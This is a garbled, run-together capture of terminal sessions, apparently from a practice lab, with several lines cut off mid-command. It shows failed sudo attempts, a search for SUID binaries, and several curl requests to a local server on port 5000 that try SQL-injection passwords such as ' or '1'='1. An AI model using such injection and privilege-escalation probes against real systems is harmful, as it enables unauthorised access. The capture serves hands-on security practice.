drwxr-xr-x 2 admin root  4.0K Sep 24 23:20 agent                                -rwxrwx--- 1 root  root   360 Sep 24 23:20 webserver.py                         admin@i-0a40943c8c217e6da:~$ vim webserver.py                                   admin@i-0a40943c8c217e6da:~$ sudo su                                                                                                                            We trust you have received the usual lecture from the local System              Administrator. It usually boils down to these three things:                                                                                                         #1) Respect the privacy of others.                                              #2) Think before you type.                                                      #3) With great power comes great responsibility.                                                                                                            [sudo] password for admin:                                                      Sorry, try again.                                                               [sudo] password for admin:                                                      

./.bash_history                                                      ./.selected_editor                                                   admin@i-05ce4152741ff5feb:~$ find / -perm -u=s -type f 2>/dev/null   /usr/lib/openssh/ssh-keysign                                         /usr/lib/dbus-1.0/dbus-daemon-launch-helper                          /usr/bin/chsh                                                        /usr/bin/umount                                                      /usr/bin/mount                                                       /usr/bin/passwd                                                      /usr/bin/newgrp                                                      /usr/bin/sudo                                                        /usr/bin/chfn                                                        /usr/bin/su                                                          /usr/bin/gpasswd                                                     admin@i-05ce4152741ff5feb:~$                                         

admin@i-087fd4cfd674aa46f:~$ history                                                1  2023-09-20T15:57:57 > /home/admin/.bash_history                              2  2023-09-20T15:58:02 exit                                                     3  2024-10-30T14:46:50 history                                              admin@i-087fd4cfd674aa46f:~$ cd /home/admin                                     

nt-Type: application/x-www-form-urlencoded' --data-urlencode 'password=" or 1=1'Access denied!admin@i-09f0e7c74e34fbdd9:~$ curl --location --request POST 'localnt-Type: application/x-www-form-urlencoded' --data-urlencode 'password=" or "1"=Access denied!admin@i-09f0e7c74e34fbdd9:~$ curl --location --request POST 'localnt-Type: application/x-www-form-urlencoded' --data-urlencode 'password=^Cor "1"=admin@i-09f0e7c74e34fbdd9:~$ curl --location --request POST 'localhost:5000' \  --header 'Content-Type: application/x-www-form-urlencoded' \                    --data-urlencode 'password='\''  or '\''1'\''='\''1'                            admin@i-09f0e7c74e34fbdd9:~$ curl --location --request POST 'localhost:5000' \al--header 'Content-Type: application/x-www-form-urlencoded' \                    --data-urlencode 'password='                                                    admin@i-09f0e7c74e34fbdd9:~$ curl --location --request POST 'localhost:5000' \al--form 'password="admin"'                                                       Access denied!admin@i-09f0e7c74e34fbdd9:~$ curl --location --request POST 'locald="admin"'